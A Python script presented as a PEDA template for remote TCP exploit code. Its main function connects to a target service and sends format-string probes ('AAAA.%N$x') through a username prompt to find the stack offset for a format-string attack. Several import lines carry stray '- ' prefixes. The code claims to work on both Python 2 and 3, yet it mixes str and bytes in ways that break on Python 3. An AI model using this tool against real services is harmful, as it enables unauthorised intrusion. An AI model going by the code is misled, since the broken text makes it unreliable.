- #!/usr/bin/env python
- #
- # Template for remote TCP exploit code, generated by PEDA
- #
- import os
- import sys
- import struct
- import resource
- import time
- import re
def usage():
    """Print the command-line synopsis (`host port`) for this script."""
    script_name = sys.argv[0]
    print("Usage: %s host port" % script_name)
- from socket import *
- import telnetlib
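class TCPClient():
    """Minimal blocking TCP client used by the fuzzer below.

    Wraps one connected socket and adds newline helpers, a delimiter
    reader and optional logging of the traffic.  Data passed in and
    returned is the socket's native string type: ``str`` on Python 2,
    ``bytes`` on Python 3 (the ``b""`` literals below are the same thing
    on both).
    """

    def __init__(self, host, port, debug=0, timeout=None):
        """Connect to host:port.

        debug:   0 = silent, 1 = log received data, >1 = also log sent data.
        timeout: seconds after which connect/send/recv raise socket.timeout.
                 The default None keeps the socket fully blocking, so a
                 target that accepts the connection but never answers hangs
                 the tool indefinitely -- pass a value when fuzzing.
        Raises socket.error if the connection cannot be established.
        """
        self.debug = debug
        self.sock = socket(AF_INET, SOCK_STREAM)
        # Set before connect() so the handshake itself is bounded too.
        if timeout is not None:
            self.sock.settimeout(timeout)
        self.sock.connect((host, port))

    def __enter__(self):
        """Allow ``with TCPClient(...) as c:``; the socket is closed on exit."""
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()

    def debug_log(self, size, data, cmd):
        """Print one traffic record as ``cmd(size): repr(data)`` when debug is on."""
        if self.debug != 0:
            print("%s(%d): %s" % (cmd, size, repr(data)))

    def send(self, data, delay=0):
        """Send all of ``data`` after an optional delay in seconds; return len(data).

        Uses sendall() instead of a single send(): a short send() would
        silently truncate the payload, and the partial byte count the
        original returned was never checked by callers.
        """
        if delay:
            time.sleep(delay)
        self.sock.sendall(data)
        nsent = len(data)
        if self.debug > 1:
            self.debug_log(nsent, data, "send")
        return nsent

    def sendline(self, data, delay=0):
        """Send ``data`` followed by a newline; see send()."""
        return self.send(data + b"\n", delay)

    def recv(self, size=1024, delay=0):
        """Read up to ``size`` bytes after an optional delay in seconds.

        Returns whatever one recv() call yields, which may be less than
        ``size``; an empty string means the peer closed the connection.
        """
        if delay:
            time.sleep(delay)
        buf = self.sock.recv(size)
        if self.debug > 0:
            self.debug_log(len(buf), buf, "recv")
        return buf

    def recv_until(self, delim):
        """Read byte by byte until the data read ends with ``delim``; return it.

        Reading one byte at a time avoids consuming anything past the
        delimiter, since this client keeps no read buffer.  Raises
        EOFError if the peer closes the connection first -- the original
        spun forever on the empty reads a closed socket returns.
        """
        buf = bytearray()
        while True:
            chunk = self.sock.recv(1)
            if not chunk:
                raise EOFError("connection closed before %r was seen" % (delim,))
            buf += chunk
            # Checked after every byte, so the first occurrence of delim
            # is always a suffix of buf.
            if buf.endswith(delim):
                break
        data = bytes(buf)
        self.debug_log(len(data), data, "recv")
        return data

    def recvline(self):
        """Read through and including the next newline; see recv_until()."""
        return self.recv_until(b"\n")

    def close(self):
        """Close the underlying socket."""
        self.sock.close()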
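def exploit(host, port, max_index=1024):
    """Find the stack slot at which the target's username input lands.

    For each index N from 1 to ``max_index`` the script answers the
    username prompt with ``AAAA.%N$x`` (``%N$x`` is printf's direct
    parameter access: print the N-th argument as hex), gives empty
    answers to the password and email prompts, and reads the result
    message, which is expected to echo the username back in single
    quotes.  The first N whose echo ends in ``41414141`` -- the four
    ``A`` bytes read back as a 32-bit hex word -- is reported as the
    stack index and the target is told ``no`` at the retry prompt;
    otherwise ``yes`` is sent and the next index is tried.

    Returns the index found, or None if none was found, the port was
    invalid, the connection failed or the run was interrupted.

    NOTE(review): each prompt is consumed with a single recv(1024).  That
    assumes every message arrives in one read; a message split across
    reads (or two prompts coalesced into one) would desynchronise the
    exchange -- confirm against the target's actual banner sizes.
    """
    try:
        port = int(port)
    except ValueError:
        print("[-] invalid port: %r" % (port,))
        return None

    found = None
    client = None
    try:
        client = TCPClient(host, port, debug=0)
        print('[+] Fuzzer started')
        for index in range(1, max_index + 1):
            # Username prompt -> positional format-string probe.
            if not client.recv(1024):
                # Empty read: the target closed the connection (it may
                # have crashed on the previous probe).
                print('[-] connection closed by target at index %d' % index)
                break
            client.sendline("AAAA.%{0}$x".format(index))
            # Password prompt -> empty answer.
            client.recv(1024)
            client.send('\n')
            # Email prompt -> empty answer.
            client.recv(1024)
            client.send('\n')
            # Result message: pull the echoed username out of its quotes.
            # A result with no quoted text (e.g. an error page or an empty
            # read) used to raise IndexError here; treat it as no match.
            quoted = re.findall(r"'(.*?)'", client.recv(1024))
            if quoted and quoted[0].endswith('41414141'):
                print("[*] stack_index @ {0}".format(index))
                found = index
            # Retry prompt: continue unless we are done.
            client.recv(1024)
            if found is None:
                client.send('yes\n')
            else:
                client.send('no\n')
                break
        print('[-] Fuzzer finished')
    except KeyboardInterrupt:
        print('[-] interrupted')
    except error as exc:
        # socket.error, brought in by the module's ``from socket import *``.
        print('[-] socket error: %s' % (exc,))
    finally:
        # Always release the connection, whichever way we left the loop.
        if client is not None:
            client.close()
    return found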
if __name__ == "__main__":
    # Two positional arguments (host, port) are required; anything less
    # prints the synopsis instead of running.
    cli_args = sys.argv[1:]
    if len(cli_args) >= 2:
        exploit(cli_args[0], cli_args[1])
    else:
        usage()